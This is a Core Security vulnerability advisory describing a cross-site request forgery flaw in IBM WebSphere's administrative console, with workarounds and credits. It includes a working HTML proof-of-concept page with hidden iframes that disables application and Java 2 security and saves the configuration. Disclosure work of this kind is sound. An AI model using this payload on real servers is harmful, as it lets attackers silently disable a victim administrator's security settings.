Core Security Technologies - CoreLabs AdvisoryIBM WebSphere Application Server Cross-Site Request Forgery
Title: IBM WebSphere Application Server Cross-Site Request Forgery
Advisory ID: CORE-2010-1021
Advisory URL: http://www.coresecurity.com/content/IBM-WebSphere-CSRF
Date published: 2011-06-15
Date of last update: 2011-06-15
Vendors contacted: IBM
Release mode: User release
WebSphere is IBM's integration software platform. It includes the entire middleware infrastructure --such as servers, services, and tools-- needed to write, run, and monitor 24x7 industrial-strength, on demand Web applications and cross-platform, cross-product solutions. WebSphere Application Server is the base for the infrastructure; everything else runs on top of it .
The administrative console of IBM WebSphere Application Server is vulnerable to Cross-Site Request Forgery (CSRF) attacks, which can be exploited by remote attackers to force a logged-in administrator to perform unwanted actions on the IBM WebSphere administrative console, by enticing him to visit a malicious web page.
Contact the vendor for a fix.
Contact the vendor for a fix. The following are workarounds for this issue.
According to OWASP , CSRF vulnerabilities can be avoided by checking the referrer of the HTTP request and verifying that the request comes from the original site. A potential workaround is thus to set a rule on a Web Application Firewall that checks the referrer of the requests, and verifies that all the requests to the WebSphere administrative console are originated from the same site.
An administrator of WebSphere administrative console could mitigate the bug by using Firefox and the NoScript add-on; more precisely by making use of the ABE  (Application Boundaries Enforcer) feature of NoScript. With ABE it is possible to define rules such as the following:
Site *.example.com Accept from SELF Deny
This rule applies to .example.com; it will allow all the requests made from the same site, and block all the requests directed to .example.com but generated from any other site, avoiding that Firefox sends the request to the server. The syntax of the ABE rules is defined here: <http://noscript.net/abe/abe_rules.pdf>
This vulnerability was discovered and researched by Francisco Falcon from Core Security Technologies during Bugweek 2010 . Additional research was performed by Alejandro Rodriguez. Publication was coordinated by Carlos Sarraute.
The administrative console (also known as Integrated Solutions Console) of IBM WebSphere Application Server is vulnerable to Cross-Site Request Forgery (CSRF)  attacks, which can be exploited by remote attackers to force a logged-in administrator to perform unwanted actions on the IBM WebSphere administrative console, by enticing him to visit a malicious web page.
The administrative console of IBM WebSphere Application Server includes a standard protection mechanism against Cross-Site Request Forgery, which consists of a token that is included as a hidden field on every
csrfid, that is sent to the web server in each
POST request performed by the web browser. When the web server receives a
POST request, it checks that the
csrfid token included in the parameters of the
POST request matches the anti-CSRF token associated with the current session. If they do not match, then IBM WebSphere responds with an "
Unauthorized Request" message, thus effectively preventing CSRF.
However, in certain areas of the administrative console, WebSphere forgets to check the value of the
csrfid token when processing
POST requests, even though the
csrfid hidden field is included in every
FORM, making the application vulnerable to Cross-Site Request Forgery.
The vulnerable areas of the WebSphere administrative console include the
Security > Global Security panel , and the
Save changes to the master configuration feature. This makes possible for a remote attacker to disable the
Application Security and
Java 2 Security options, and then to save the changes to the configuration, by tricking an IBM WebSphere administrator which is currently logged in to the administrative console to visit a malicious web page. Also note that IBM WebSphere 7.0 with Fix Pack 11 did not include a
csrfid token for the
Save changes to the master configuration feature; Fix Pack 13 introduced it, but anyways it is ignored on the server side when processing a request to save the master configuration.
The following HTML code is a Proof-of-Concept of a specially crafted web page that will leverage the CSRF vulnerability in order to disable the
Application Security and
Java 2 Security options, if a logged-in administrator visits it:
<html> <body> <iframe id="iframe1" style="visibility:hidden"></iframe> <iframe id="iframe2" style="visibility:hidden"></iframe> <script> //The first request disables "Administrative security" and "Application security" options document.getElementById("iframe1").src = "https://<ip>:9043/ibm/console/adminSecurityDetail.do?action=Edit&displayActiveUserRegistry=Repositorios+federados&selectUserRegistry=WIM&activeAuthMechanism=LTPA&apply=Aplicar"; //The second request saves the changes in the WebSphere configuration document.getElementById("iframe2").src = "https://<ip>:9043/ibm/console/syncworkspace.do?saveaction=save&directsave=true"; </script> </iframe> </body> </html>
 IBM WebSphere Application Server:
 Cross-Site Request Forgery (CSRF)
 Application Boundaries Enforcer (ABE)
 The author participated in Core Security's Bugweek 2010 as member of the team "Ex Tester fuErTes and Exploit Testers".
 Finding bugs and publishing advisories - the Core Security way
 IBM WebSphere Reference, Global Security settings:
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: <http://corelabs.coresecurity.com>.
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: <http://www.coresecurity.com>.
The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.